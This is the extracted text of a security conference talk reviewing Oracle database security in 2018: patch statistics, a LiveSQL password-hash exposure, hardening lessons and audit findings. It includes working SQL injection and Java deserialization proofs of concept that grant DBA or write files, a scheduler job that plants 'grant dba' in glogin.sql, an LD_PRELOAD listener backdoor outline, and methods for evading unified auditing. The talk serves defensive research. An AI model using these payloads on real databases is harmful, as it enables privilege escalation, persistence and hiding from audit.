best of oracle 2018 - the cloud databases by hacking probability (e.g....

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Best of Oracle Security 2018

What happened in 2018?


! Intro ! ! January 2018 - November 2018 ! DNS Exfiltration ! Bypass Oracle Auditing ! Outlook 2019 ! Q&A

OOW 2018 & Larry’s bot army for autonomous databases

„… modern cloud is constantly under attack by what are called botnets…“* „Because if they have robot attacks on our clouds, and robot attacks in our data centers and our government agencies, you better have robotic defenses…“ * Already discussed in 2012 by Red-Database-Security („Selfdefending databases“**)


OOW 2018 & Larry Ellison about Cloud Security

“We’ve seen headlines, you know, cyber break-ins at Google, at Facebook, at Amazon, big government agencies,” he said. “It’s happening because these architectures, these old cloud architectures really were never designed for security.  Security was an afterthought.”

LiveSQL security

Oracle 18c testdrive Hardened Oracle 18c with free SQL interface (requires OTN account) - Part I

Check which tables are accessible sys.user$ was accessible All password hashes included - Part I - Part I

Reported to 2 weeks later the problem was fixed And I got a credit in the October 2018 CPU - Part II

Is the issue (revoke select on sys.user$) now solved? Yes, the user$ problem was fixed, but a real attacker would continue… - Attacker’s next steps

Analyze collected data from sys.user$ 786 Entries in SYS.USER$ A few (13) unsecure MD5-Passwords (H:) Old case insensitive Oracle 10g/DES Passwords (password column) Most accounts have 3 passwords DES, SHA1 and PBKDF2-Passwords User for 3rd-party security scanner QUALYS installed (QUALYS_SCAN).

Crack the password hashes (e.g. using hashcat).(BTW, using passwords with <word>123 is not a strong password) Identify shared (over multiple DBs) service accounts (here QUALYS_SCAN) - ASSUMPTION

Majority of customers are using the identical passwords for agent accounts for all systems Setting the password via „identified by values“ is an indicator for the usage of the same password My Assumption: Oracle was using the same password for ALL cloud instances. Having a has value of a highly privileged account on all Oracle (cloud?) systems is VERY interesting for attackers (if the hash can be cracked) After an information disclosure it is recommended to change ALL occurrences of the password (if the password is not strong, 16+ characters)

Post-Incident-Steps on Cloud-Systems

Try to analyze what happened on the system (using auditing) Analyze side effects to other cloud systems(e.g. shared accounts) Check, if the attacker could escape from the system Remove reports/dumps/… with suspicious information. …

Lessons Learned - Oracle in (hacked) Cloud Systems

Never use (agent) accounts with identical passwords (e.g. Nagios, Patrol, Scan-User, …) to avoid interference with other cloud systems Harden your cloud databases (dbsat, qualys, … alone is not sufficient) Classify the cloud databases by hacking probability (e.g. custom sql/reporting is highly dangerous) Always have a post-incident workflow in place (analyze what happened during the attack) Audit suspicious attacks (e.g. select * from sys.user$ is ALWAYS suspicious) Cleanup traces of the attacker (e.g. livesql reports with password hashes)

Database Vulnerabilities and CPU

Again the patch situation is better (down from 14 in 2017 to 12 in 2018)

Problem: At the moment only a few people are looking for security bugs in the database

Nowadays it’s rare that exploit code for databases is published Several unnamed security fixed affect the fully qualified references (e.g. SYS.DBMS_SCHEDULER instead of DBMS_SCHEDULER)

Database Vulnerabilities and CPU

Rodrigo Jorge is providing detailed analysis of the Oracle CPUs*


<     DBMS_SCHEDULER.SET_ATTRIBUTE(M_NEW_JOB_NAME, 'REPEAT_INTERVAL',<                                  M_INTERVAL);--->     SYS.DBMS_SCHEDULER.SET_ATTRIBUTE(M_NEW_JOB_NAME, 'REPEAT_INTERVAL',>                                      M_INTERVAL);

" "" "

Oracle Vulnerabilities 2018

Oracle Vulnerabilities 2018

Number of vulnerabilities in Oracle database reduced again

! 12 findings in 2018 (2017: 14, 2016:30 , 2015: 29, 2014: 43, 2013: 13 2012: 17)

! 6 remote exploitable bugs (2016: 8, 2015:3, 2014: 4, 2013: 7, 2012: 8 )

• January 2018 CPU (5 Vulnerabilities – 3 remote)

• April 2018 CPU (1 Vulnerabiliy – 0 remote)

• July 2018 CPU (3 Vulnerabilities – 1 remote)

• October 2018 CPU (3 Vulnerabilities – 2 remote)

Jan 2018 - Nov 2018

January 2018

Oracle CPU January 2018 *


January 2018 CPU*

5 security fixes (3 remote exploitable)

2 RDBMS (CVSS 9.1, 2.0)

1 Java VM (CVSS 8.3)

1 WLM (Apache Tomcat) (CVSS 8.1)

1 APEX (CVSS 6.1)


CVE-2017-10282 (CVSS 9.1)

CVE-2017-10282 SQL Injection in CDBView (, This SQL Injection affects and when the user has this privileges on CDB$ROOT or if it is a non-CDB. Exploit shown last year, fixed in 2018


Oracle 12.x Exploit I

SQL> conn doag2017/doag2017 Connect durchgeführt.

SQL> select granted_role from user_role_privs;


SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to doag2017''; RETURN ''1'';END; SELECT f as x FROM dual)-- ‚);

CVE-2017-12617 (CVSS 8.1)

CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat Affect systems with HTTP PUTs enabled (via setting the "read-only" initialization parameter of the Default servlet to "false") are affected.

CVE-2017-12617 (CVSS 8.1)

CVE-2017-12617 (CVSS 8.1)

CVE-2017-12617 (CVSS 8.1)

CVE-2017-12617 (CVSS 8.1)

February 2018

Project Rico2 (Oracle Block Based Editor, Open Source)*

* **

Rico 2 - Open Source BBED

* **

rico2 > set offset 338rico2 > d File: /u01/app/oracle/oradata/SKIPER/652E0234EC88260AE0530100007FFD8B/datafile/o1_mf_system_f88l7sop_.dbf(11) Block: 2809 Offsets: 338 to 850        Dba: 0x2c00af9---------------------------------------------------------------c1020180 07787602 0e102118 ff3b4f72 | .....xv...!..;Or61636c65 20417070 6c696361 74696f6e | acle Application20457870 72657373 2052656c 65617365 |  Express Release20342e32 2e352e30 302e3038 202d2050 | - P

Oracle Transparent Data Encryption (TDE) is blocking data access via data blocks.

March 2018

nothing special happened

April 2018

Oracle CPU April 2018* 18.1 Features: SQL Injection Detection in SQL Developer **

* **

April 2018 CPU*

1security fix (0 remote exploitable)

1 Java VM (CVSS 8.5)


SQL Injection Detection in SQL Developer

CREATE OR REPLACE PROCEDURE get_record ( user_name IN VARCHAR2, service_type IN VARCHAR2, rec OUT VARCHAR2)IS query VARCHAR2(4000);BEGIN -- Following SELECT statement is vulnerable to modification -- because it uses concatenation to build WHERE clause. query := 'SELECT value FROM secret_records WHERE user_name=''' || user_name || ''' AND service_type=''' || service_type || ''''; DBMS_OUTPUT.PUT_LINE('Query: ' || query); EXECUTE IMMEDIATE query INTO rec ; DBMS_OUTPUT.PUT_LINE('Rec: ' || rec );END;/

SQL Injection Detection

May 2018

How to bypass requirement of WITH GRANT OPTION on views accessing third-party tables*


May 2018 - Bypass grant option

SQL> grant select on USER_B.v1 to USER_C;grant select on USER_B.v1 to USER_C *FEHLER in Zeile 1:ORA-01720: Berechtigungsoption f³r 'USER_A.T1' nicht vorhanden

SQL> conn USER_B/oracleConnected.SQL> CREATE OR REPLACE PACKAGE pkg_bypass_go AS  2    3    TYPE t_tab IS TABLE OF USER_A.T1%ROWTYPE;  4    5    FUNCTION run (p_sql  IN  CLOB)  6      RETURN t_tab PIPELINED;  7    8  END pkg_bypass_go;  9  / Package created. SQL> CREATE OR REPLACE PACKAGE BODY pkg_bypass_go AS  2    3    FUNCTION run (p_sql  IN  CLOB)  4      RETURN t_tab PIPELINED  5    IS  6      l_cursor SYS_REFCURSOR;  7      l_row    USER_A.T1%ROWTYPE;  8    BEGIN  9      OPEN l_cursor FOR p_sql; 10      LOOP 11        FETCH l_cursor 12        INTO  l_row; 13        EXIT WHEN l_cursor%NOTFOUND; 14        PIPE ROW (l_row); 15      END LOOP; 16      CLOSE l_cursor; 17      RETURN; 18    END run; 19   20  END pkg_bypass_go; 21  / 

Use a Pipeline Function to bypass the limitation

May 2018 - Bypass grant optionIf the USER_B account, who owns the view, also had the CREATE PROCEDURE privilege, he could bypass the ORA-01720 error by encapsulating the table T1 results on a pipelined function, and use this function inside his view.

SQL> create view USER_B.v1 as select * from USER_A.t1;SQL> grant select on USER_B.v1 to USER_C;grant select on USER_B.v1 to USER_C *FEHLER in Zeile 1:ORA-01720: Berechtigungsoption f³r 'USER_A.T1' nicht vorhanden

SQL> create .. pipeline function….

SQL> create or replace view USER_B.v1 as select * from table('select * from USER_A.t1’));

SQL> grant select on USER_B.v1 to USER_C; Grant succeeded.

June 2018

Protecting Oracle Database Binaries against malicious changes * Implement a hidden trojan in an oracle database**

* **

June 2018 - Protecting Oracle Database Binaries against malicious changes

New Oracle 18c feature: Read-Only Oracle Home Ensure that no Oracle process is creating or changing files in the $ORACLE_HOME 1. Save current permissions and owners 2. Remove privileges from OS user Oracle 3. Rollback before applying patches

June 2018 - Trojan in TNS Listener

Using LD_PRELOAD to implement a hidden trojan in an oracle database Works in Read-Only-Oracle Home (ROOH) too Put a backdoor in /tmp/ and use LD_PRELOAD to replace the Oracle library Start the TNS listener and connect directly (e.g. via netcat)


July 2018

Oracle CPU July 2018 *


July 2018 CPU*

3 security fixes (1 remote exploitable)

1 Oracle Spatial (CVSS 9.8, remote)

1 Core RDBMS (CVSS 8.4)

1 Java VM (CVSS 5.3)


CVE-2018-3004 (CVSS 5.4)

Privilege escalation via a java deserialization vector that bypasses built in Oracle JVM security. Proper exploitation can allow an attacker to gain shell level access on the server and SYS level access to the database.

read/write files without.using Oracle directory objects Exploits:

Insert SSH keys Modify login.sql Escape from CDB …


Oracle 12.x Exploit I

SQL> conn doag2018/doag2018 Connect durchgeführt.

SQL> create or replace and compile java source named DecodeMe as import*; import java.beans.*; public class DecodeMe{ public static void input(String xml) throws InterruptedException, IOException { XMLDecoder decoder = new XMLDecoder ( new ByteArrayInputStream(xml.getBytes())); Object object = decoder.readObject(); System.out.println(object.toString()); decoder.close();

Oracle 12.x Exploit I

SQL> CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2) IS language java name 'DecodeMe.input(java.lang.String)'; /

Oracle 12.x Exploit ISQL> BEGIN decodeme(' <java class="java.beans.XMLDecoder" version="1.4.0"> <object class=""> <string>C:\doag2018\doag2018.txt</string> <boolean>True</boolean> <void method="write"> <string>content of file doag2018.txt</string> </void> <void method="close" /> </object> </java> '); END; /

August 2018

Nothing special happened

September 2018

! Nothing special happened

October 2018

Oracle CPU October 2018 *


October 2018 CPU*

3 security fixes (2 remote exploitable)

1 Java VM (CVSS 9.8, remote)

1 ORACLE Text (CVSS 8.2 remote)

1 Rapid Home Provisioning (CVSS 2.3)


CVE-2018-7489 (Rapid Home Provisioning)

FasterXML jackson-databind before and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath.

" " "

End of the annual review

DNS Exfiltration

DNS exfiltration is an old technique to exchange data between 2 computers without a direct connection.*

DNS Exfiltration

DNS Exfiltration

Several networks are vulnerable against DNS exfiltration This vulnerability can also be abused from an Oracle database This technique allows data transfer from (network) protected databases the outside Used during SQL Injection attacks Website helps to identify the problem (!!! Created DNS link is only valid for 24 h)

DNS Exfiltration

SQL> select utl_http.request('') from dual;

FEHLER in Zeile 1: ORA-29273: HTTP-Anforderung nicht erfolgreich ORA-12541: TNS: Kein Listener ORA-06512: in "SYS.UTL_HTTP", Zeile 1491 ORA-06512: in Zeile 1


SQL> select utl_http.request('') from dual;

FEHLER in Zeile 1: ORA-29273: HTTP-Anforderung nicht erfolgreich ORA-12541: TNS: Kein Listener ORA-06512: in "SYS.UTL_HTTP", Zeile 1491 ORA-06512: in Zeile 1

DNS Exfiltration

Several Oracle databases are vulnerable against DNS exfiltration

dbms_scheduler & SQL Scripts

Oracle 12.2 comes with a powerful feature to run SQL scripts It’s a feature, not a bug… All SQL*Plus commands (host, …) are allowed Requires CREATE EXTERNAL JOB privilege The following sample shows how to modify the glogin.sql on a database server

Sample SQL*Plus Script

host icacls "glogin.sql" /grant Users:F Host echo set term on >> glogin.sql host echo @ >> glogin.sql host echo grant dba to wuser identified by wuser; >> glogin.sql Host echo set term on >> glogin.sql

* Absolute path entries removed to make the sample more readable

Oracle 12.x Exploit ISET SERVEROUTPUT ON DECLARE l_job_name VARCHAR2(30); l_script VARCHAR2(32767); BEGIN l_job_name := DBMS_SCHEDULER.generate_job_name; DBMS_OUTPUT.put_line('JOB_NAME=' || l_job_name);

l_script := ' host icacls "C:\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql" /grant Users:F host echo @ >> C:\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql host echo grant dba to webuser identified by webuser; >>C:\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql


Oracle 12.x Exploit I DBMS_SCHEDULER.create_job( job_name => l_job_name, job_type => 'SQL_SCRIPT', job_action => l_script, credential_name => 'oracle_ol6_121', enabled => FALSE);

-- Set the credential used for SQL*Plus to -- connect to the database; DBMS_SCHEDULER.set_attribute( name => l_job_name, attribute => 'connect_credential_name', value => ‚test_pdb1_ol6_121');

-- Enable the job. DBMS_SCHEDULER.enable(l_job_name); END; /

Changes in 12.2/18c

A lot of useful security issues were changed in Oracle 12.2 / 18c All reference/index privileges from Oracle vendor accounts were removed Default ACL for XMLDB user and DBA role were removed on new databases. Only SYS can now bypass ACLs VPD can now be audited

New SQL Injection pattern

SQL> select * from dual where 1=1 and dbms_xdb_version.checkin((select user from dual))='1';select * from dual where 1=1 and dbms_xdb_version.checkin((select user from dual))='1' *FEHLER in Zeile 1:ORA-31001: Ressourcen-Handle oder Pfadname ung³ltig: SYSORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 30ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 45

SQL> select * from dual where 1=1 and dbms_xdb_version.makeversioned((select user from dual))='1';select * from dual where 1=1 and dbms_xdb_version.makeversioned((select user from dual))='1' *FEHLER in Zeile 1:ORA-31001: Ressourcen-Handle oder Pfadname ung³ltig: SYSORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 3ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 18


Findings from Security Audits in 2018

Weak passwords (slowly getting better) Cleartext passwords in audit logs (if username/password was switched) Privilege Escalation via CREATE INDEX privilege (already shown 2016) Too many privileges (e.g. grant ALL, ANY privileges, …) …

Auditing SYS with loginuser

Many DBAs are using SSH to connect to the database server using their personal UNIX account After the logon they use the su command to change to the Oracle user Now they connect to the database using sqlplus / as SYSDBA

Auditing SYS (with login user)

ssh dbserver1 (as weber) su - oracle sqlplus / as sysdbaSQL> create user hacker identified as hacker;

ssh dbserver1 (as schmidt)

su - oracle

sqlplus / as sysdba

SQL> create user cracker identified as cracker;

SQL> select sessionid, os_username, dbusername, sql_text, UNIFIED_AUDIT_POLICIES from unified_audit_trail;

2056298984 oracle SYS create user cracker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS

2602877895 oracle SYS create user hacker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS

Who am I vs. whoamiMajority of DBAs are not aware that there is a difference between who and who am I

who am i: Login user whoami: Effective user


ssh dbserver1 (as weber) su - oracle

Who am I weberWho oracle

Auditing SYS (with login user)

——- glogin.sql ———

set term offhost echo define login_user=`who | cut -d" " -f1` > loguser.sql@loguser.sqlexec dbms_session.set_identifier('&login_user‘);set term on

——- glogin.sql ———

Alternative: Logon-Trigger can read the (original) login user id from /proc/<processid>/loginuid via an external table and join this uid with the real name from /etc/passwd (via external table or inline external SQL)

Auditing SYS (with login user)

ssh dbserver1 (as weber)

su - oracle

sqlplus / as sysdba

SQL> create user hacker identified as hacker;

ssh dbserver1 (as schmidt)

su - oracle

sqlplus / as sysdba

SQL> create user crackeridentified as cracker;

SQL> select sessionid, client_identifier, os_username, dbusername, sql_text, UNIFIED_AUDIT_POLICIES from unified_audit_trail;

2056298984 oracle schmidt SYS create user cracker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS

2602877895 oracle weber SYS create user hacker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS

Auditing SYS (with login user)

It is now possible to distinguish between different SYSDBA/SYSOPER connections at session level (v$session and audit trail). Try to use the new users SYSBACKUP, SYSDG, SYSKM instead of SYS Another advantage of using SYSBACKUP, SYSDG and SYSKM are limited privileges

Outlook 2019

Started with a new investigation „How to bypass database auditing solutions“

Found multiple security bugs and issues in auditing components of databases (Oracle, Hana), 3rd-party Audit Solutions and SIEM solutions

Bugs are still unfixed and to protect the innocent I will wait until 2019 to release the presentation

Found more than 40 different ways to bypass Auditing

Sneak Preview Audit Issues

How to detect if a table is monitored using Oracle unified Auditing Simple ways to bypass Oracle Auditing

Detect protected tables

To find out if a table is protected by unified auditing you can use the „set transaction read only“ command If the session is set to readonly, Oracle Unified Auditing is not able to write the audit entry ;-) No Audit entry was created (but no data retrieved as well)

Fixed in Oracle 18c

Access protected tableswithout creating audit entries

There are various ways to avoid audit entries when accessing audited tables. Sample:

create audit policy sel_emp actions select on scott.emp;audit policy sel_emp; SQL> set transaction read only;

SQL> select * from sel.emp where rownum=1 /*xx*/ ; *

FEHLER in Zeile 1:

ORA-02002: Fehler beim Schreiben von Audittrail

ORA-55917: Tabellen-Flush-I/O nicht erfolgreich für Log-ID: 1 Bucket-ID: 0

ORA-55917: Tabellen-Flush-I/O nicht erfolgreich für Log-ID: 1

Bucket-ID: 0

ORA-01456: INSERT/DELETE/UPDATE bei einer READ ONLY Transaktion nicht zulässig

How can we get the table data without triggering auditing?

Alter table rename scott.emp to scott.noemp; select * from scott.noemp; Alter table rename scott.noemp to scott.emp;

+ a few more (noaudit, alter user, dbms_sys_sql, ….)

rename scott.emp to scott.noemp; select * from scott.noemp; rename scott.noemp to scott.emp;

drop table scott.emp; select * from "BIN$HGnc55/7rRPgQPeM/qQoRw==$0";flashback table scott.emp to before drop; Create table scott.noemp as select * from scott.emp; select * from scott.noemp; [Fixed in July 2017 CPU, src: Oracle secalert]

Trends 2019

Much more Oracle 18c vulnerabilities

Migration to 18c/19c

Oracle & Cloud Systems

Oracle Multi-Tenant

More auditing projects

Integration Auditing with SIEM solutions

Q & A

Thank you Contact:

Red-Database-Security GmbH Eibenweg 42 D-63150 Heusenstamm Germany

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